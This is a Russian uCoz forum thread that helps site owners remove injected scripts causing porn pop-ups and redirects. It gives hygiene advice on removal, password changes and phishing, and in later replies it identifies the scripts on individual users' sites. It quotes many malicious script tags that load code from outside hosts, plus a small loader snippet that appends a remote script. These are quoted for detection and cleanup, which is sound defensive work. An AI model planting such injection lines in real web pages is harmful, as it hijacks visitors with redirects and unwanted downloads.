Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Если на вашем сайте появились порнобаннеры (порнобаннеры, всплывающая реклама, окна или переброс)
Если на вашем сайте появились порнобаннеры
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1 | 15:57:08
Если на вашем сайте постоянные перебросы на другие сайты или появляется куча всплывающих рекламных баннеров, порнобаннеров, то вы должны проверить код страниц на наличие следующих скриптов:

Код
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/hvuz2754blb414j/niucee.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/eipt4uu8dbovggv/niuggcee.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/1ca1t7akhf87zrc/flashsiteru.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/af6arwcjnknnb15/menu.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/ud3ne5xe8dcre8u/topbottom.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/kuejhhvopk6nw6z/mysql.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/g5zffknmr8da4tp/update.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/4lgd2g170q96tq3/menu-v2.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/4f9eakzpj17n2yw/shapka.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/tnwyduomjbcsxzm/opapo.txt"></script>
<script type="text/javascript" src="https://dl.dropboxusercontent.com/s/207odofje1uzdl5/orororo.txt"></script>
<script language="JavaScript" src="http://gocash.ws/js/slider.php?id=51"></script>
<script language="javascript" src="http://golink2.ru9.biz/js/back.php?id=43"></script>
<script language='javascript' type='text/javascript' src='http://omirevovne.ru/55zgn5x6ihj88voak3xatwx61o2o28l'></script>
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://omirevovne.ru/739tqn6t0d66blax8ijp5g164r61v4ut'></script>
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://omirevovne.ru/98vihkxfbix863weu7zv9wqxjxhbbdh'></script>
<script type="text/javascript" src="http://nativevat.hol.es/rases.txt"></script>
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://tsingera.ru/5easame6c5z7eb11wv3tp0164r61v4ut'></script>
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/6mg4oc9iyoi50h5tcwiudp6yfoe9gnd5e53tyz991m51k05'></script>
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/9bg8m0fsumq6pg79dp5ikt8sy9lxik40i89gq7udb51xjt1'></script>
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/7s0qxmmi2365xqgf6si4b17klvgtdyvrm5ex2ij7pdg5jet'></script>
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8jqhrtj5gcy538xp6e6s7h8nepubdfejg5vjptg5p0eti11'></script>


Актуальные на данный момент и самые распространенные эти скрипты

Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://bobrilla.com/7h4p5qn4qhr8ee1ywr1nh01af3d31nbp'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://iqmasa.ru/6rzofz8uuc28ef8pehs6rx5nbidd8hra473w3yk0c1n9d39'></script>

Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://fasterdir.ru/8v0n2hh3me45jvyxrtdyc4164r61v4ut'></script>


Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://omirevovne.ru/739tqn6t0d66blax8ijp5g164r61v4ut'></script>


Код
<script language='javascript' type='text/javascript' src='http://omirevovne.ru/55zgn5x6ihj88voak3xatwx61o2o28l'></script>


Код
<script language="javascript" src="http://golink2.ru9.biz/js/back.php?id=43"></script>


Код
<script language="JavaScript" src="http://gocash.ws/js/slider.php?id=51"></script>


Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://mobatori.com/6h3mo39hhqx8pibnjyshzo13skikuus5'></script>


Код
<script language='javascript' type='text/javascript' src='http://omirevovne.ru/55zgn5x6ihj88voak3xatwx61o2o28l'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8mi9nn0te6q68tjygr5vm573z85xk4lzw89gq7udb51xh8l'></script>


Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://tsingera.ru/5easame6c5z7eb11wv3tp0164r61v4ut'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/6mg4oc9iyoi50h5tcwiudp6yfoe9gnd5e53tyz991m51k05'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/9bg8m0fsumq6pg79dp5ikt8sy9lxik40i89gq7udb51xjt1'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/7s0qxmmi2365xqgf6si4b17klvgtdyvrm5ex2ij7pdg5jet'></script>


Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8jqhrtj5gcy538xp6e6s7h8nepubdfejg5vjptg5p0eti11'></script>


Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://chicop.ru/68sb0mshp9b78t1epj44r8zi8bjocb9'></script>


Код
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://mobmas.ru/s/948'></script>


Код

<script type="text/javascript">
  (function(w) {
  var script = document.createElement('script');
  var i = setInterval(function() {
  if (typeof w.document.body !== 'undefined') {
  script.src = 'http://knjjiiyqj.about-home.info' + '/?818010=LmcuKHw4NjU5MTM-KWdrbm5oaG0';
  w.document.body.appendChild(script);
  clearInterval(i);
  }
  }, 200);
})(window);
</script>
<script type="text/javascript">
  (function(w) {
  var script = document.createElement('script');
  var i = setInterval(function() {
  if (typeof w.document.body !== 'undefined') {
  script.src = 'http://knjjiiyqj.about-home.info' + '/?823389=KWApL3s_MTI-NjQ5LmBsaWlvb2U';
  w.document.body.appendChild(script);
  clearInterval(i);
  }
  }, 200);
})(window);
</script>



Как удалить:

1) Код как правило внедряется в шаблоны Страницы сайта. Модуль новости (все шаблоны) но могут быть варианты. Иногда код внедряется во все шаблоны сайта.
Прописывается в верхней части шаблона или в самом низу. Реже встречается в футере (глобальный блок Нижняя часть сайта)

2) Для удаления нужно воспользоваться функцией Быстрой замены. Для этого надо пройти в панель управления - Дизайн - Управление дизайном - Быстрая замена - В поле "Что заменить" вставляете скрипт (даже если внедрено много скриптов лучше удалять по одному) - Поле на что изменить оставляете пустым и производите замену во всех действующих модулях
Если скриптов много внедрено, можно попробовать многострочную замену по той же схеме
3) После очистки сайта от внедренного кода нужно обязательно сменить пароль uID профиля, которым администрируете сайт. Инструкция по изменению пароля находится тут //forum.ucoz.ru/forum/45-52299-1
4) Если после изменения uID пароля на новый сложный у вас снова и снова возникает проблема внедрения чужеродного кода, то выполните следующие инструкции:
1) создайте нового пользователя в панели управления сайтом: задайте ему Логин и сложнейший пароль
2) дайте созданному пользователю права администратора, а у бывшего uID профиля, которым администрировали сайт заберите права и переведите его в низшую группу
3) в общих настройках сайта поставьте старый Вид кнопки uID авторизации и далее администрируйте сайт локально
5) Если локальный способ администрирования для вас не подходит, то создайте в системе ещё один uID профиль, на котором не будет сайтов и прав управления ни одним из сайтов. И новый созданный профиль используйте для авторизации на сайтах системы uCoz с uID авторизацией. А uID профилем, которым вы администрируете сайт или сайты заходите только к себе на сайты и более никуда. И поставьте на uID пароль администратора сайта сложнейший пароль!
6) Заберите права доступа к админ бару другим администраторам и модераторам вашего сайта. не пускайте никого в панель управления сайтом
7) Будьте внимательны к письмам, которые приходят на вашу почту. Часто мошенники имитируют письма от вебсервиса uCoz, в которых просят вас пройти или верификацию или пройти по ссылкам, также просят ввод ваших данных (вебтоп пароль и пароль uID профиля или секретный вопрос и ответ). Если вы сомневаетесь в письме, которое вам пришло от имени сервиса, вы можете всегда спросить или на форуме в этой теме //forum.ucoz.ru/forum/45-46950-1 или перешлите его сразу на адрес abuse@ucoz.ru
Будьте всегда бдительны и следите за темой //forum.ucoz.ru/forum/45-35739-1


Если вы вообще ничего не поняли, но проблема появления всплывающих порнобаннеров и переброски на чужие сайты с вашего у вас существует, то при обращении в эту тему вы должны дать ссылку на свой сайт, дать ссылку на сайт куда перебрасывает (если есть переброс), а так же указать происходит это под логином или под гостем

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 436 | 10:52:07
VMariush, из блока наша кнопка удалить скрипт
Код
<script language="javascript" charset="UTF-8" type="text/javascript" src="http://azsin.ru/7utbz5dpe8r9175g55253q9644ezidmxc5hix5m394bg7urdho3dc7v7y700csjlni46i49qoh?6j06rjf8=3e18"></script>
отпишитесь о результате

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
VMariush
Сообщений: 7
Репутация: 2

Сообщение # 437 | 12:12:15
Цитата webanet ()
VMariush, из блока наша кнопка удалить скрипт
Большое спасибо, теперь всё нормально!

Tess1919
Сообщений: 26
Репутация: 0

Сообщение # 438 | 03:43:39
Здравствуйте. От Яндекс пришло письмо: "На страницах сайта guides.moy.su обнаружены ссылки на файлы или программы, к которым добавлено дополнительное программное обеспечение.
Таким образом, вместе со скачанным файлом на компьютер посетителя могут
быть установлены дополнительные программы — безопасные или сомнительные. В настоящий момент сайт выводится в результатах поиска с пометкой «Будьте осторожны при скачивании файлов с этого сайта».
Фалов для закачки на сайте нет, однако действительно, при клике по любому из пунктов меню идет переадресация на http://download.viparchive1.ru/?file_n...._id=113
Не могу найти никак код этой переадресации, После одного перехода по этой сслке она не появляется снова в течение какого-то времени, думаю суток.
Помогите найти вредоносный код, пожалуйста.
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 439 | 11:07:27
Tess1919, ваша реклама виновата. в неё вставлены загрузчики на скачку.


код рекламы

Код
<script charset="windows-1251" type="text/javascript" src="http://code.directadvert.ru/show.cgi?adp=100457&div=DIV_DA_100457"></script>

<!--noindex--><div id="amsb"></div><script type="text/javascript" src="//am15.net/sb.php?s=40468"></script><script type="text/javascript" src="//am15.net/cu.php?s=40468"></script><!--/noindex-->
Прикрепления: 5366334.jpg (32.3 Kb)

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Tess1919
Сообщений: 26
Репутация: 0

Сообщение # 440 | 12:31:32
Спасибо. Я сразу подумала что это из-за кода рекламы так как ее не выделяла тегом <!--noindex--!>. Даже удалила его на нескольких страницах. А потом все же решила перестраховаться и спросить у спецов. Еще раз большое спасибо.
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 441 | 12:36:07
Tess1919, ноиндекс в данном случае вам ничем не поможет вообще. только удаление. как удалите везде пишите в тех.поддержку яндекса и просите пересмотреть сайт

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
clera11a
Сообщений: 1
Репутация: 0

Сообщение # 442 | 00:01:25
сайт не находится в системе uCoz. обращайтесь за помощью к своему хостеру
Сообщение отредактировал webanet - Четверг, 11 Авг 2016, 16:29:20
Sokolova9538
Сообщений: 3
Репутация: 0

Сообщение # 443 | 23:00:03
Здравствуйте, сайт http://dekretmir.ru/ перепробовала быстрой заменой всё предложенное, реклама так и осталась
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 444 | 23:11:07
Sokolova9538,
Код
<SCRIPT>http://browser-update.org/update.js<SCRIPT>http://sync.users-api.com/etg.js<SCRIPT>
это ваше. остальное системный баннер. отключается он при оплате пакета услуг базовый и выше. удалить скрипты из шаблонов нельзя. только платное отключение

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Sokolova9538
Сообщений: 3
Репутация: 0

Сообщение # 445 | 14:45:22
<SCRIPT>http://browser-update.org/update.js<SCRIPT>http://sync.users-api.com/etg.js<SCRIPT> этот также быстрой заменой не убирается. подскажите, пожалуйста, где его удалить.
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 446 | 19:09:13
Sokolova9538, не удаляется, потому что в коде сайта эти скрипты выглядят чуть по-другому
например предупреждение об устаревшем браузере выглядит вот так
Код
<script type="text/javascript"> <!--Outdated browsers warning/message and link to Browser-Update. Comment or delete it if you don?t want to use it-->
var $buoop = {}
$buoop.ol = window.onload;
window.onload=function(){
try {if ($buoop.ol) $buoop.ol();}catch (e) {}
var e = document.createElement("script");
e.setAttribute("type", "text/javascript");
e.setAttribute("src", "http://browser-update.org/update.js");
document.body.appendChild(e);
}
</script>

вы сами это это ставили. должны знать куда и как. отсюда и далее в этой теме обсуждение сомнительных баннеров

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Sokolova9538
Сообщений: 3
Репутация: 0

Сообщение # 447 | 20:10:00
подскажите, а если перебрасывает при нажатии на тему форума, это тоже моё или юкоз? http://ndazara.com/?trk=fb7f3f49e22df992909addc1b5209cda&s_trk=ChB1WbrcwU8R5ogaDMR6qa90EIqnwNIMGMm9wMIFINi9wMIF&cb=f939e40e при входе как посетитель.
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 448 | 20:40:54
Sokolova9538, уберите хотя бы видео рекламу. это можно сделать без оплаты услуг самостоятельно. панель управления - настройка баннера и копирайта юкоз - поставьте галку на не показывать видео рекламу - сохраните

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Admin2557
Сообщений: 1
Репутация: 0

Сообщение # 449 | 09:11:53
Добрый день, подскажите, пожалуйста, как решить следующую проблему.
При попытке вход на сайт http://umo74.ucoz.ru/
Браузер перекидывает меня на страницу с адресом http://findbetterresults.com/?dn=dmev.me&pid=9PO755G95
Не могу зайти на сайт в качестве администратора, чтобы его редактировать и дополнять информацию
zarim
Сообщений: 489
Репутация: 82
Уровень замечаний:

Сообщение # 450 | 09:57:10
Admin2557, удалите из шаблона вот этот скрипт, он перед "</body> </html>"


Код
<script type="text/javascript" src="http://dmev.me/uGost/ver1-2/11/uGost11.js"></script>


В админку можно войти отсюда: http://umo74.ucoz.ru/admin/
Сообщение отредактировал zarim - Четверг, 12 Окт 2017, 10:09:27
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Если на вашем сайте появились порнобаннеры (порнобаннеры, всплывающая реклама, окна или переброс)
Поиск: